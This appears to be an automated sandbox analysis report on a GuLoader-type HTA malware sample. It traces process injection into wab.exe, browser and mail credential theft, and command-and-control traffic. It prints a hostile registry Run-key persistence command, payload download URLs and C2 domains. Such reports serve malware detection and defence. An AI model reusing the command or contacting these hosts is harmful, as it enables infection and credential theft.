              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C92639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_22C92B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C960E2

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AC0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1CFB20
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*YG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*sG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managernet/OG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerles}G
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr; Binary or memory string: [2024/05/02 01:15:11 Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerd996cahG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager5
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerd996caaG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr; Binary or memory string: [2024/05/02 01:15:01 Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerles
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: |Program Manager|
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 10_2_22C92933 cpuid 10_2_22C92933
              Source: C:\Windows\SysWOW64\mshta.exe; Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 10_2_22C92264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_22C92264
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 16_2_0041739B GetVersionExW,16_2_0041739B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match; File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara match; File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: ESMTPPassword 19_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 19_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 19_2_00402DB3
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 4476, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara match; File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 11 Native API | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 11 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 310 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 51 Security Software Discovery | SSH | 2 Clipboard Data | 24 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 51 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

              [Behavior graph, ID: 1435041. Sample: PLOCMR-002 Dane dotycz#U010...; Startdate: 02/05/2024; Architecture: WINDOWS; Score: 100. Process chain shown: mshta.exe -> powershell.exe -> powershell.exe -> wab.exe, which drops C:\Users\user\AppData\Roaming\mvourhjs.dat and starts further wab.exe processes.]


| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | 54% | ReversingLabs | Script-WScript.Trojan.Guloader | |

              No Antivirus matches
              No Antivirus matches
              No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://www.imvu.comr | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| http://geoplugin.net/json.gp | 100% | URL Reputation | phishing | |
| http://www.ebuddy.com | 0% | URL Reputation | safe | |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi | 0% | Avira URL Cloud | safe | |
| http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/json.gp0 | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/Subumbilical.dwpXR | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/json.gpI | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/i | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE | 0% | Avira URL Cloud | safe | |
| jgbours284hawara01.duckdns.org | 100% | Avira URL Cloud | malware | |
| http://www.imvu.comata | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/Subumbilical.dwp | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/json.gpg | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin | 0% | Avira URL Cloud | safe | |
| http://87.121.105.163 | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/json.gp_ | 0% | Avira URL Cloud | safe | |
| http://crl.ver) | 0% | Avira URL Cloud | safe | |
| http://87.121.108 | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/ | 0% | Avira URL Cloud | safe | |
| http://geoplugin.net/json.gprqDS | 0% | Avira URL Cloud | safe | |


| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| jgbours284hawara01.duckdns.org | 192.169.69.26 | true | true | | unknown |
| geoplugin.net | 178.237.33.50 | true | false | | unknown |
| www.google.com | 142.250.80.100 | true | false | | high |
| jgbours284hawara02.duckdns.org | 45.88.90.110 | true | true | | unknown |


| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| jgbours284hawara01.duckdns.org | true | Avira URL Cloud: malware | unknown |
| https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high |
| https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
| https://www.google.com/async/newtab_promos | false | | high |
| http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown |
| https://www.google.com/async/ddljson?async=ntp:2 | false | | high |
| https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high |
| http://87.121.105.163/Subumbilical.dwp | false | Avira URL Cloud: safe | unknown |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin | false | Avira URL Cloud: safe | unknown |


| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://duckduckgo.com/chrome_newtab | wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr | false | | high |
| http://www.imvu.comr | wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/ac/?q= | wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr | false | | high |
| http://87.121.105.163/Subumbilical.dwpXR | powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://geoplugin.net/i | wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE | wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://geoplugin.net/json.gp0 | wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi | wab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://contoso.com/License | powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | | high |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr | false | | high |
| http://www.nirsoft.net | wab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmp | false | | high |
| http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com | wab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://geoplugin.net/json.gpI | wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.dr | false | | high |
| https://contoso.com/ | powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://login.yahoo.com/config/login | wab.exe | false | | high |
| http://www.nirsoft.net/ | wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high |
| http://www.imvu.comata | wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u | wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                                                        http://geoplugin.net/json.gp_wab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://geoplugin.net/json.gprqDSwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://geoplugin.net/json.gpgwab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icowab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.imvu.comwab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2632650469.000000000302D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://87.121.105.163powershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCuwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                  high
                                                                  http://crl.ver)svchost.exe, 00000003.00000002.3226864730.0000021BB3E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://www.ecosia.org/newtab/wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                    high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                        high
                                                                        http://87.121.108powershell.exe, 00000001.00000002.2770000985.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        https://g.live.com/odclientsettings/Prod/C:edb.log.3.drfalse
                                                                          high
                                                                          http://geoplugin.net/wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.google.com/accounts/serviceloginwab.exefalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                                                              high
                                                                              http://www.ebuddy.comwab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.80.100 | www.google.com | United States | 15169 | GOOGLEUS | false
